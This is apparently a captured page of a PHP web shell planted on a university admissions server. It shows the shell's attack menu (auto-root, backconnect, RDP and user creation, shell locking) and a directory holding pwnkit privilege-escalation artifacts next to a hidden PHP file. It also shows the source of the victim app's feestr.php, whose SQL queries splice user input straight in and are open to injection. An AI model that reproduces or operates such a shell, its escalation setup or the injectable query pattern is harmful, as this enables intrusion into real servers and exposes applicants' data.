Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.17.185.204
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pgadm2020 /
pgetadm /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
.pgetadm.php
3.61
KB
-rw-r--r--
PrintAdmissionOrderstudent.php
9.83
KB
-rwxrwxrwx
Seat_Allotment_Details.php
11.36
KB
-rw-r--r--
add-course.php
5.63
KB
-rwxrwxrwx
admfee.php
9.25
KB
-rw-rw-r--
admissionorderPGReport.php
15.91
KB
-rwxrwxrwx
admissionordertest.php
356
B
-rwxrwxrwx
admorder_bnu.php
14.93
KB
-rw-r--r--
app-status.php
2.39
KB
-rwxrwxrwx
applicationFormPGReport.php
43.11
KB
-rwxrwxrwx
bcuapplicationFormPGReport.php
35.13
KB
-rwxrwxrwx
bnuapplicationFormPGReport.php
35.47
KB
-rwxrwxrwx
category.php
2.52
KB
-rwxrwxrwx
data.json
1.98
KB
-rwxrwxrwx
degree.php
12.38
KB
-rwxrwxrwx
feestr.php
5.92
KB
-rwxrwxrwx
forgot-password.php
2.77
KB
-rw-rw-r--
forgot-password_old.php
2.31
KB
-rwxrwxrwx
getSavedData.php
8.49
KB
-rwxrwxrwx
getSavedData_old_12102019.php
5
KB
-rwxrwxrwx
hallticket.php
7.61
KB
-rwxrwxrwx
login.php
947
B
-rwxrwxrwx
logout.php
44
B
-rwxrwxrwx
option-entry.php
4.34
KB
-rwxrwxrwx
option-entryPrint.php
9.29
KB
-rwxrwxrwx
printadmissionorder.php
616
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
reprint.php
707
B
-rwxrwxrwx
resetpassword.php
700
B
-rwxrwxrwx
saveApplication.php
25.7
KB
-rwxrwxrwx
saveApplication051120.php
23.67
KB
-rwxrwxrwx
saveApplication_old_12102019.p...
14.67
KB
-rwxrwxrwx
seat-allot.php
1008
B
-rwxrwxrwx
sendGridMail.php
1.28
KB
-rwxrwxrwx
sendMobEmailOTP.php
1.41
KB
-rwxrwxrwx
sendsmsapi.php
760
B
-rwxrwxrwx
signin.php
996
B
-rwxrwxrwx
signup.php
1.01
KB
-rwxrwxrwx
validateRegno.php
1.94
KB
-rwxrwxrwx
vkuapplicationFormPGReport cop...
36.61
KB
-rwxrwxrwx
vkuapplicationFormPGReport.php
37.97
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : feestr.php
<?php function getFees($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $fcatcode = $aobj_context->mobj_data["fcatcode"]; $fdegree = $aobj_context->mobj_data["fdegree"]; $db = $aobj_context->mobj_data["db"]; $cnd = "ifnull(fprfee,0) as frepfee, ffee as fmaxfee"; // if (strpos("$fdegree", 'MBA*')!== false) { // $cnd = "ifnull(frepfee,0) as frepfee, fmaxfee"; // }else if(strpos("$fdegree", 'MBE*')!== false) // { // $cnd = "ifnull(frepfee,0) as frepfee, fmaxfee"; // } if($db == 'bcu') { $deg = 'CERT'; }else { $deg = 'PGET'; } $query = "select fheadcode,{$cnd} from admfeestr where fdegree ='{$deg}' and fcatcode = '{$fcatcode}' and fcombcode = '{$deg}' and fexamno = 'A' and date_format(now(), '%Y-%m-%d') between fadmfeesdate and fadmfeeedate order by fheadcode"; //var_dump($query); $result1 = $aobj_context->mobj_db->GetAll($query); if(!$result1 && gettype($result1) == 'boolean'){ $arr['msg'] = "Error while fetching data"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } if(count($result1) > 0) { $arr['feestr'] = $result1; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); return; } else { $arr['msg'] = "No data found"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } } function validateregno($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $regno = $aobj_context->mobj_data["regno"]; $query = "select a.fdegree, b.fdescpn, a.fcollcode, concat(cl.fcollname,', ', cl.ftown)as fcollname, a.fsubcode, a.fexamno, a.fmaxmarks, a.fsecmarks, co.funivname from control co, entvalmarks a inner join entprevdeg b on a.fdegree = b.fdegree inner join college cl on a.fcollcode = cl.fcollcode where fregno = '{$regno}' and fsubtype = 'T'"; $result1 = $aobj_context->mobj_db->GetAll($query); if(count($result1) == 0) { $arr['msg'] = "Data not found for the Reg. No."; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } $fdegree = $result1[0]['fdegree']; $fcollname = $result1[0]['fcollname']; $funivname = $result1[0]['funivname']; $tot_arr = array(); foreach($result1 as $k => $v) { $tot_arr['fsubcode'] = $v['fsubcode']; $tot_arr['f'.strtolower($v['fexamno']).'mm'] = $v['fmaxmarks']; $tot_arr['f'.strtolower($v['fexamno']).'mo'] = $v['fsecmarks']; } $query = "select b.fsubcode, b.fsubname, a.fexamno, a.fmaxmarks, a.fsecmarks from entvalmarks a inner join entprevcomb b on 'lan' = b.fdegree and a.fsubcode = b.fnewsub where fregno = '{$regno}' and fsubtype = 'L' order by fsubcode, fexamno"; $result1 = $aobj_context->mobj_db->GetAll($query); $lan_arr = array(); foreach($result1 as $k => $v) { $lan_arr[$v['fsubcode']]['fsubcode'] = $v['fsubcode']; $lan_arr[$v['fsubcode']]['f'.strtolower($v['fexamno']).'mm'] = $v['fmaxmarks']; $lan_arr[$v['fsubcode']]['f'.strtolower($v['fexamno']).'mo'] = $v['fsecmarks']; } $query = "select b.fsubcode, b.fsubname, a.fexamno, a.fmaxmarks, a.fsecmarks from entvalmarks a inner join entprevcomb b on a.fdegree = b.fdegree and a.fsubcode = b.fnewsub where a.fregno = '{$regno}' and a.fsubtype = 'O' order by a.fsubcode, a.fexamno"; $result1 = $aobj_context->mobj_db->GetAll($query); $opt_arr = array(); foreach($result1 as $k => $v) { $opt_arr[$v['fsubcode']]['fsubcode'] = $v['fsubcode']; $opt_arr[$v['fsubcode']]['fsubname'] = $v['fsubname']; $opt_arr[$v['fsubcode']]['f'.strtolower($v['fexamno']).'mm'] = $v['fmaxmarks']; $opt_arr[$v['fsubcode']]['f'.strtolower($v['fexamno']).'mo'] = $v['fsecmarks']; } if(!$result1 && gettype($result1) == 'boolean'){ $arr['msg'] = "Error while fetching data"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } if(count($result1) > 0) { $query = "select ifnull(fappno,'') as fappno, ifnull(ffinsub,'F') as ffinsub, ifnull(fpaystatus,'') as fpaystatus from entstudadm where fmobileno = '{$_SESSION['MOBILE']}'"; // var_dump($query); $result2 = $aobj_context->mobj_db->GetRow($query); $fappno = $result2['fappno']; $query = "select distinct fsubcode as int_code, fsubname as val from entprevcomb where fdegree = 'lan' and fcombcode = 'lan' order by fdescpn"; $result2 = $aobj_context->mobj_db->GetAll($query); $query = "select x.fdegree, y.fdescpn, if(ifnull(z.fdegree,'')='','','checked') as sddeg from (select distinct b.* from entvalmarks a, enteligdeg b where a.fdegree = b.fprevdeg and a.fsubcode = b.fnewsub and fregno = '{$regno}' union select distinct b.* from entvalmarks a, enteligdeg b where a.fdegree = b.fprevdeg and a.fsubcode = b.fsubcode and fregno = '{$regno}') x inner join entdeg y on x.fdegree = y.fdegree left join entoptdeg z on x.fdegree = z.fdegree and z.fappno = '{$fappno}' group by x.fdegree"; $result3 = $aobj_context->mobj_db->GetAll($query); $res = array( 'tot_arr' => $tot_arr, 'lan_arr' => $lan_arr, 'opt_arr' => $opt_arr, 'lansub' => $result2, 'degree' => $fdegree, 'college' => $fcollname, 'univname' =>$funivname, 'eligdeg' => $result3, 'combcode' => 'UNIV', 'combdesc' => 'University Marks' ); $arr['vkuprevdata'] = $res; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); return; } else { $arr['msg'] = "No data found"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } }
Close